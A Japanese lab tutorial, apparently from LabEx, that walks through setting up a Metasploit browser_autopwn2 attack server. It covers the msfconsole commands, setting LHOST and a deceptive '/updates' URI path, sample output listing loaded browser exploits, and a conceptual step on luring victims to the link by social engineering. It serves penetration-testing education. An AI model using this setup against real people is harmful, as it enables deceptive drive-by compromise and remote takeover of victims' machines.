この実験では、Metasploit Framework の強力な機能の 1 つであるブラウザ autopwn 攻撃について詳しく説明します。この攻撃は、悪意のある Web サーバーをセットアップし、ターゲットがそれを訪問すると、被害者のブラウザの種類とバージョンを自動的に検出し、発見された脆弱性に合わせて調整されたエクスプロイトを提供するというものです。
ここでは、元のブラウザ autopwn の更新され、より信頼性の高いバージョンである auxiliary/server/browser_autopwn2 モジュールを使用します。この実験では、モジュールの選択、必要なオプションの設定、およびサーバーの起動プロセスをガイドします。
免責事項: この実験は教育目的のみです。説明されている技術は、自身が所有しているシステム、またはテストの明示的な許可を得ているシステムに対してのみ実行してください。
このステップでは、Metasploit Framework コンソールを起動し、攻撃セットアップの中核となる browser_autopwn2 モジュールを選択します。
まず、ターミナルを開き、Metasploit コンソールを起動します。ここでは、よりクリーンなインターフェースのためにバナーを抑制する「サイレント」起動のための -q フラグを使用します。
msfconsole -qコンソールがロードされると、msf6 > のような Metasploit プロンプトが表示されます。Metasploit はツールをモジュールに整理しています。攻撃をセットアップするには、browser_autopwn2 補助モジュールを使用する必要があります。use コマンドを使用してそれを選択します。
use auxiliary/server/browser_autopwn2コマンドを実行すると、この特定のモジュールのコンテキストにいることを示すようにプロンプトが変更されます。
msf6 > use auxiliary/server/browser_autopwn2
msf6 auxiliary(server/browser_autopwn2) >これで、モジュールのオプションを設定する準備ができました。
このステップでは、LHOST オプションを設定します。LHOST は「Local Host」の略で、攻撃マシン(LabEx VM)の IP アドレスに設定する必要があります。エクスプロイトが成功すると、被害者のマシンはこの IP アドレスに接続し戻ってくるため、制御が可能になります。
まず、LabEx VM の IP アドレスを見つける必要があります。ターミナルウィンドウの + アイコンをクリックして、新しいターミナルタブを開きます。新しいターミナルで、次のコマンドを実行して IP アドレスを表示します。
ip addr show eth0 | grep "inet " | awk '{print $2}' | cut -d/ -f1以下のような出力が表示されます。ご自身の IP アドレスをコピーしてください。
10.0.2.15次に、msfconsole が実行されている元のターミナルに戻ります。browser_autopwn2 モジュールの設定可能なすべてのオプションを表示するには、show options コマンドを使用します。
show optionsオプションのリストが表示されます。LHOST は必須ですが、まだ設定されていないことに注意してください。set コマンドを使用して、先ほどコピーした IP アドレスで LHOST を設定します。YOUR_IP_ADDRESS を実際の IP アドレスに置き換えてください。
set LHOST YOUR_IP_ADDRESS例えば、IP が 10.0.2.15 であった場合、コマンドは次のようになります。
set LHOST 10.0.2.15Metasploit は変更を確認します。
LHOST => 10.0.2.15これで LHOST は正しく設定されました。
このステップでは、URIPATH を設定します。このオプションは、攻撃をトリガーするために被害者がアクセスする必要がある Web サーバー上の特定のパスを定義します。デフォルト以外の目立たないパスを使用すると、攻撃がわかりにくくなる可能性があります。
前のステップと同様に、show options を使用して現在の設定を確認できます。URIPATH にはデフォルト値があることがわかりますが、カスタム値に変更します。
パスを /updates に設定しましょう。これにより、ユーザーはソフトウェアアップデートページにアクセスしていると誤解する可能性があります。set コマンドを使用して URIPATH を変更します。
set URIPATH /updatesコンソールは URIPATH が更新されたことを確認します。
URIPATH => /updatesこれで、被害者がアクセスする必要がある悪意のある URL は http://<YOUR_IP_ADDRESS>:8080/updates になります。
このステップでは、必要なオプションがすべて設定されたら、補助モジュールを起動します。これにより、潜在的な被害者からの着信接続をリッスンする Web サーバーがマシン上で開始されます。
モジュールを開始するには、msfconsole プロンプトで run と入力して Enter キーを押すだけです。
runMetasploit はサーバーを開始し、関連するすべてのブラウザエクスプロイトをロードします。サーバーの初期化に伴い、多くの出力が表示されます。確認すべき重要な情報は、サーバーが開始されたことと、使用している URL です。
出力は以下のようになります(詳細は異なる場合があります)。
[*] Auxiliary module running as a background job 0.
[*] Using URL: http://10.0.2.15:8080/updates
[*] Server started.
[*] Starting the payload handler...
[*] Analyzing browser info and matching exploits...
[*] Added exploit/windows/browser/adobe_flash_avm2...
[*] Added exploit/windows/browser/adobe_flash_copy_pixels...
... (さらに多くのエクスプロイトがリストされます) ...これで、悪意のあるサーバーが実行され、ブラウザが http://10.0.2.15:8080/updates(実際の IP を使用)に接続するのを積極的に待機しています。ブラウザが接続すると、サーバーはそれを分析し、適切なエクスプロイトを起動しようとします。
この最終ステップでは、この攻撃の最も重要な部分である、ターゲットに悪意のある URL を訪問させる方法について説明します。サーバーは実行されていますが、受動的です。被害者がリンクにアクセスするまで何もできません。このフェーズはソーシャルエンジニアリングに大きく依存します。
この実験環境には個別の「被害者」マシンが含まれていないため、このステップは純粋に概念的なものです。実行するコマンドはありません。
ターゲットに悪意のあるリンク(http://YOUR_IP_ADDRESS:8080/updates)を配信するために一般的に使用される方法をいくつか紹介します。
脆弱なブラウザを持つターゲットがあなたの URL にアクセスした場合、browser_autopwn2 は適切なエクスプロイトを自動的に提供します。エクスプロイトが成功すると、Metasploit コンソールに「セッション」が開かれ、被害者のマシンへのリモートアクセスが可能になります。ターミナルに [*] Session 1 opened... のようなメッセージが表示されます。
この実験の完了おめでとうございます!Metasploit Framework を使用したブラウザの自動攻撃(autopwn attack)の基本的な手順を習得しました。
この実験では、以下のことを行いました。
auxiliary/server/browser_autopwn2 モジュールを選択しました。LHOST および URIPATH オプションを設定しました。この演習は、ペネトレーションテストツールがいかに強力で自動化されているかを示しています。また、このような攻撃から身を守るために、Web ブラウザとそのプラグインを常に最新の状態に保つことの重要性も強調しています。常に、この知識を責任を持って倫理的に使用することを忘れないでください。
